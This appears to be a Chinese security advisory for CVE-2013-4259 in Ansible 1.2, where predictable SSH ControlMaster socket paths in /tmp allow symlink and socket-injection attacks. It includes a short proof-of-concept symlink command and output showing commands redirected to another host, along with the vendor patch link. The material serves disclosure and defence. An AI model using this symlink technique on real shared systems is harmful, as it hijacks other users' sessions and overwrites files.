发布日期:2013-09-03
更新日期:2013-09-05受影响系统:
ansible ansible 1.2
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 62137
CVE(CAN) ID: CVE-2013-4259ansible是简单的配置管理、部署、任务执行、多节点编制框架。ansible 1.2会在/tmp的可预测位置创建ControlMaster文件,可造成ssh套接字注入,导致符号链接攻击,覆盖受影响应用上下文中的任意文件。<*来源:Michael Scherer (mscherer@redhat com)
链接:https://bugzilla.redhat.com/show_bug.cgi?id=998223
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!~ $ sudo ln -s /tmp/ansible-ssh-elspeth.example.org-22-misc /tmp/ansible-ssh-sisay.example.org-22-misc
~ $ ansible -i "elspeth.example.org,sisay.example.org" all -m shell -u misc -a hostname
elspeth.example.org | success | rc=0 >>
elspeth.example.orgsisay.example.org | success | rc=0 >>
elspeth.example.org建议:
--------------------------------------------------------------------------------
厂商补丁:ansible
-------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:https://github.com/ansible/ansiblehttps://github.com/ansible/ansible/commit/6bf5d195065bc23b5fc72ba690d7ed45f228aaf0
Palo Alto Networks PAN-OS远程信息泄露漏洞(CVE-2012-6596)Cisco Secure Access Control System远程拒绝服务漏洞(CVE-2013-5470)相关资讯 ansible
- Ansible自动化安装Nginx (今 12:38)
- Ansible自动化运维工具使用详解 (07月23日)
- Ansible 运维自动化 ( 配置管理工 (07月19日)
| - Ansible安装配置入门基础知识 (今 08:33)
- Ansible自动化运维工具学习手册 (07月23日)
- CentOS 6.5下企业级自动化运维部署 (06月26日)
|
图片资讯
- Ansible自动化安装
- Ansible安装配置入门
- Ansible自动化运维工
- Ansible自动化运维工
- Ansible+Corosync+
- 使用Ansible部署LAMP
- Ansible 2.0 发布下载
- Red Hat 收购 Ansible
本文评论 查看全部评论 (0)
|
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
|
| 
易网时代-编程资源站